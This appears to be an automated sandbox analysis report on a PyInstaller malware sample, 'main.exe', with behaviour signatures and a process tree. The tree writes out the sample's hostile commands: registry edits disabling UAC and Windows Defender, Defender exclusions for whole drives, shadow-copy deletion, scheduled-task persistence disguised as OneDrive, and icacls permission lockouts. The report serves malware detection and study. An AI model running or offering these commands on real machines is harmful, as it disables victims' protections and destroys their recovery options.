Analysis

  • max time kernel
    48s
  • max time network
    42s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    27-12-2024 21:32

General

  • Target

    main.exe

  • Size

    34.1MB

  • MD5

    eeb38085b04102207c7c48c118dc2f37

  • SHA1

    e6dd4c5846ca9b18c25dd4e65cb132ca03508c8b

  • SHA256

    87f0b82e20d4c24b11d74b2909c8027b932e3f53fe4fe27e92c7b37baba88daf

  • SHA512

    b33d0cb5dc0fec990e1c061577ad09bffb1bba93f4cc5890bce8a5bf6872663b9dc4720c0f26bb2f266a2b95fc3bd7f2014c37d097d28287b796dcceceed4a92

  • SSDEEP

    786432:t9YidhvMkqW8rK1QtICrhHJ5da8DZcUThl8Fsx6fg0TyVusDg:t9JbqW9iICrhDI61Ak4g0eUs

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 4 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Disables cmd.exe use via registry modification 2 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Possible privilege escalation attempt 9 IoCs
  • Drops startup file 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Impair Defenses: Safe Mode Boot 1 TTPs 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 9 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 39 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 3 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 13 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 38 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry key 1 TTPs 12 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\main.exe
    "C:\Users\Admin\AppData\Local\Temp\main.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2476
    • C:\Users\Admin\AppData\Local\Temp\main.exe
      "C:\Users\Admin\AppData\Local\Temp\main.exe"
      2⤵
      • Drops startup file
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4100
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5612
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f
          4⤵
          • Modifies registry key
          PID:6076
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4468
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • Modifies registry key
          PID:3140
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3404
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f
          4⤵
          • Modifies registry key
          PID:4488
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3636
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • Modifies registry key
          PID:572
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\systemrayxadmin\system.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5976
        • C:\Windows\system32\tasklist.exe
          tasklist /FI "IMAGENAME eq rayxservice.exe"
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4876
        • C:\Windows\system32\find.exe
          find /I "rayxservice.exe"
          4⤵
            PID:1120
          • C:\Users\systemrayxadmin\rayxservice.exe
            "C:\Users\systemrayxadmin\rayxservice.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:5904
            • C:\Users\systemrayxadmin\rayxservice.exe
              "C:\Users\systemrayxadmin\rayxservice.exe"
              5⤵
              • Disables cmd.exe use via registry modification
              • Drops file in Drivers directory
              • Drops startup file
              • Executes dropped EXE
              • Impair Defenses: Safe Mode Boot
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • System policy modification
              PID:3700
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"
                6⤵
                  PID:3428
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f
                    7⤵
                    • Modifies registry key
                    PID:6060
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
                  6⤵
                    PID:5700
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                      7⤵
                      • UAC bypass
                      • Modifies registry key
                      PID:4936
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"
                    6⤵
                      PID:3972
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f
                        7⤵
                        • Modifies registry key
                        PID:2392
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"
                      6⤵
                        PID:1584
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                          7⤵
                          • UAC bypass
                          • Modifies registry key
                          PID:1712
                      • C:\Windows\SYSTEM32\reg.exe
                        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f
                        6⤵
                          PID:3756
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2704
                        • C:\Windows\SYSTEM32\reg.exe
                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
                          6⤵
                          • Disables cmd.exe use via registry modification
                          • Modifies registry key
                          PID:404
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Add-MpPreference -ExclusionPath 'D:\'"
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5740
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"
                          6⤵
                            PID:2268
                            • C:\Windows\system32\reg.exe
                              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                              7⤵
                              • Modifies registry key
                              PID:3612
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "Add-MpPreference -ExclusionPath '.exe'"
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3024
                          • C:\Windows\SYSTEM32\netsh.exe
                            netsh wlan show profiles
                            6⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Network Configuration Discovery: Wi-Fi Discovery
                            PID:5812
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "Add-MpPreference -ExclusionPath '.bat'"
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3256
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "Add-MpPreference -ExclusionPath '.vbs'"
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of AdjustPrivilegeToken
                            PID:708
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "Add-MpPreference -ExclusionPath '.py'"
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1092
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist"
                            6⤵
                              PID:5292
                              • C:\Windows\system32\tasklist.exe
                                tasklist
                                7⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1832
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Add-MpPreference -ExclusionPath '.pyw'"
                              6⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4780
                            • C:\Windows\System32\Wbem\wmic.exe
                              wmic product get name
                              6⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5956
                            • C:\Windows\SYSTEM32\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                              6⤵
                                PID:5104
                              • C:\Windows\SYSTEM32\reg.exe
                                reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f
                                6⤵
                                  PID:2076
                                • C:\Windows\SYSTEM32\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                  6⤵
                                  • Modifies Windows Defender Real-time Protection settings
                                  PID:2936
                                • C:\Windows\SYSTEM32\reg.exe
                                  reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /f
                                  6⤵
                                    PID:4800
                                  • C:\Windows\SYSTEM32\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
                                    6⤵
                                      PID:5524
                                    • C:\Windows\SYSTEM32\reg.exe
                                      reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /f
                                      6⤵
                                        PID:664
                                      • C:\Windows\SYSTEM32\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /t REG_DWORD /d 1 /f
                                        6⤵
                                          PID:5072
                                        • C:\Windows\SYSTEM32\reg.exe
                                          reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /f
                                          6⤵
                                            PID:5252
                                          • C:\Windows\SYSTEM32\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
                                            6⤵
                                              PID:1576
                                            • C:\Windows\SYSTEM32\reg.exe
                                              reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /f
                                              6⤵
                                                PID:4504
                                              • C:\Windows\SYSTEM32\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /t REG_DWORD /d 1 /f
                                                6⤵
                                                  PID:4092
                                                • C:\Windows\SYSTEM32\reg.exe
                                                  reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /f
                                                  6⤵
                                                    PID:6076
                                                  • C:\Windows\SYSTEM32\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /t REG_DWORD /d 1 /f
                                                    6⤵
                                                      PID:5376
                                                    • C:\Windows\SYSTEM32\reg.exe
                                                      reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /f
                                                      6⤵
                                                        PID:5316
                                                      • C:\Windows\SYSTEM32\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /t REG_DWORD /d 1 /f
                                                        6⤵
                                                          PID:2312
                                                        • C:\Windows\SYSTEM32\reg.exe
                                                          reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /f
                                                          6⤵
                                                            PID:4420
                                                          • C:\Windows\SYSTEM32\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /t REG_DWORD /d 1 /f
                                                            6⤵
                                                              PID:5916
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "taskkill /f /im firefox.exe"
                                                              6⤵
                                                                PID:4804
                                                                • C:\Windows\system32\taskkill.exe
                                                                  taskkill /f /im firefox.exe
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  PID:3788
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "icacls "C:\Users" /grant %username%:F"
                                                                6⤵
                                                                  PID:3884
                                                                  • C:\Windows\system32\icacls.exe
                                                                    icacls "C:\Users" /grant Admin:F
                                                                    7⤵
                                                                    • Possible privilege escalation attempt
                                                                    • Modifies file permissions
                                                                    PID:2376
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\rayx\starter.exe" /sc onlogon /f"
                                                                  6⤵
                                                                    PID:3068
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\rayx\starter.exe" /sc onlogon /f
                                                                      7⤵
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:2200
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "icacls "C:\Users\rayx" /deny *S-1-1-0:(D)"
                                                                    6⤵
                                                                      PID:1428
                                                                      • C:\Windows\system32\icacls.exe
                                                                        icacls "C:\Users\rayx" /deny *S-1-1-0:(D)
                                                                        7⤵
                                                                        • Possible privilege escalation attempt
                                                                        • Modifies file permissions
                                                                        PID:664
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "icacls "C:\Users\rayx" /deny *S-1-5-32-544:(D)"
                                                                      6⤵
                                                                        PID:1164
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls "C:\Users\rayx" /deny *S-1-5-32-544:(D)
                                                                          7⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:3244
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "icacls "C:\Users\rayx" /deny *S-1-5-32-545:(D)"
                                                                        6⤵
                                                                          PID:5252
                                                                          • C:\Windows\system32\icacls.exe
                                                                            icacls "C:\Users\rayx" /deny *S-1-5-32-545:(D)
                                                                            7⤵
                                                                            • Possible privilege escalation attempt
                                                                            • Modifies file permissions
                                                                            PID:3920
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c takeown /f C:\Windows\System32\drivers\etc\hosts
                                                                          6⤵
                                                                            PID:1576
                                                                            • C:\Windows\system32\takeown.exe
                                                                              takeown /f C:\Windows\System32\drivers\etc\hosts
                                                                              7⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3528
                                                                          • C:\Windows\SYSTEM32\setx.exe
                                                                            setx PATH "C:\Users\systemrayxadmin;C:\Users\Admin\AppData\Local\Temp\_MEI59042\pywin32_system32;C:\Users\Admin\AppData\Local\Temp\_MEI24762\pywin32_system32;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;"
                                                                            6⤵
                                                                              PID:4844
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f"
                                                                              6⤵
                                                                                PID:2960
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f
                                                                                  7⤵
                                                                                  • Modifies registry key
                                                                                  PID:1456
                                                                              • C:\Windows\SYSTEM32\diskpart.exe
                                                                                diskpart
                                                                                6⤵
                                                                                  PID:4468
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f"
                                                                                  6⤵
                                                                                    PID:1888
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                                                      7⤵
                                                                                      • Disables RegEdit via registry modification
                                                                                      • Modifies registry key
                                                                                      PID:5928
                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                    vssadmin delete shadows /all /quiet
                                                                                    6⤵
                                                                                    • Interacts with shadow copies
                                                                                    PID:572
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"
                                                                                    6⤵
                                                                                      PID:2504
                                                                                      • C:\Windows\system32\icacls.exe
                                                                                        icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"
                                                                                        7⤵
                                                                                        • Possible privilege escalation attempt
                                                                                        • Modifies file permissions
                                                                                        PID:1580
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command "Checkpoint-Computer -Description \"CustomRestorePoint\" -RestorePointType \"MODIFY_SETTINGS\""
                                                                                      6⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:2368
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "echo %COMPUTERNAME%"
                                                                                      6⤵
                                                                                        PID:760
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                        6⤵
                                                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                        PID:5704
                                                                                        • C:\Windows\system32\netsh.exe
                                                                                          netsh wlan show profiles
                                                                                          7⤵
                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                          PID:4756
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "echo %USERNAME%"
                                                                                        6⤵
                                                                                          PID:3476
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "netsh wlan show interfaces"
                                                                                          6⤵
                                                                                            PID:5360
                                                                                            • C:\Windows\system32\netsh.exe
                                                                                              netsh wlan show interfaces
                                                                                              7⤵
                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                              PID:4356
                                                                                      • C:\Windows\system32\timeout.exe
                                                                                        timeout /t 1
                                                                                        4⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:2980
                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                        tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                        4⤵
                                                                                        • Enumerates processes with tasklist
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:2172
                                                                                      • C:\Windows\system32\find.exe
                                                                                        find /I "rayxservice.exe"
                                                                                        4⤵
                                                                                          PID:5964
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          timeout /t 1
                                                                                          4⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:5608
                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                          tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                          4⤵
                                                                                          • Enumerates processes with tasklist
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3088
                                                                                        • C:\Windows\system32\find.exe
                                                                                          find /I "rayxservice.exe"
                                                                                          4⤵
                                                                                            PID:3836
                                                                                          • C:\Windows\system32\timeout.exe
                                                                                            timeout /t 1
                                                                                            4⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:5428
                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                            tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                            4⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4420
                                                                                          • C:\Windows\system32\find.exe
                                                                                            find /I "rayxservice.exe"
                                                                                            4⤵
                                                                                              PID:1948
                                                                                            • C:\Windows\system32\timeout.exe
                                                                                              timeout /t 1
                                                                                              4⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:3200
                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                              tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                              4⤵
                                                                                              • Enumerates processes with tasklist
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:5032
                                                                                            • C:\Windows\system32\find.exe
                                                                                              find /I "rayxservice.exe"
                                                                                              4⤵
                                                                                                PID:2848
                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                timeout /t 1
                                                                                                4⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:5848
                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                                4⤵
                                                                                                • Enumerates processes with tasklist
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:5116
                                                                                              • C:\Windows\system32\find.exe
                                                                                                find /I "rayxservice.exe"
                                                                                                4⤵
                                                                                                  PID:1960
                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                  timeout /t 1
                                                                                                  4⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:5932
                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                  tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                                  4⤵
                                                                                                  • Enumerates processes with tasklist
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:6088
                                                                                                • C:\Windows\system32\find.exe
                                                                                                  find /I "rayxservice.exe"
                                                                                                  4⤵
                                                                                                    PID:5876
                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                    timeout /t 1
                                                                                                    4⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:1356
                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                    tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                                    4⤵
                                                                                                    • Enumerates processes with tasklist
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3908
                                                                                                  • C:\Windows\system32\find.exe
                                                                                                    find /I "rayxservice.exe"
                                                                                                    4⤵
                                                                                                      PID:5404
                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                      timeout /t 1
                                                                                                      4⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:3104
                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                      tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                                      4⤵
                                                                                                      • Enumerates processes with tasklist
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4720
                                                                                                    • C:\Windows\system32\find.exe
                                                                                                      find /I "rayxservice.exe"
                                                                                                      4⤵
                                                                                                        PID:448
                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                        timeout /t 1
                                                                                                        4⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:5732
                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                        tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                                        4⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1388
                                                                                                      • C:\Windows\system32\find.exe
                                                                                                        find /I "rayxservice.exe"
                                                                                                        4⤵
                                                                                                          PID:5324
                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                          timeout /t 1
                                                                                                          4⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:5840
                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                          tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                                          4⤵
                                                                                                          • Enumerates processes with tasklist
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:1496
                                                                                                        • C:\Windows\system32\find.exe
                                                                                                          find /I "rayxservice.exe"
                                                                                                          4⤵
                                                                                                            PID:728
                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                            timeout /t 1
                                                                                                            4⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:4872
                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                            tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                                            4⤵
                                                                                                            • Enumerates processes with tasklist
                                                                                                            PID:584
                                                                                                          • C:\Windows\system32\find.exe
                                                                                                            find /I "rayxservice.exe"
                                                                                                            4⤵
                                                                                                              PID:4408
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              timeout /t 1
                                                                                                              4⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:6088
                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                              tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                                              4⤵
                                                                                                              • Enumerates processes with tasklist
                                                                                                              PID:1548
                                                                                                            • C:\Windows\system32\find.exe
                                                                                                              find /I "rayxservice.exe"
                                                                                                              4⤵
                                                                                                                PID:3500
                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                timeout /t 1
                                                                                                                4⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:488
                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                tasklist /FI "IMAGENAME eq rayxservice.exe"
                                                                                                                4⤵
                                                                                                                • Enumerates processes with tasklist
                                                                                                                PID:3796
                                                                                                              • C:\Windows\system32\find.exe
                                                                                                                find /I "rayxservice.exe"
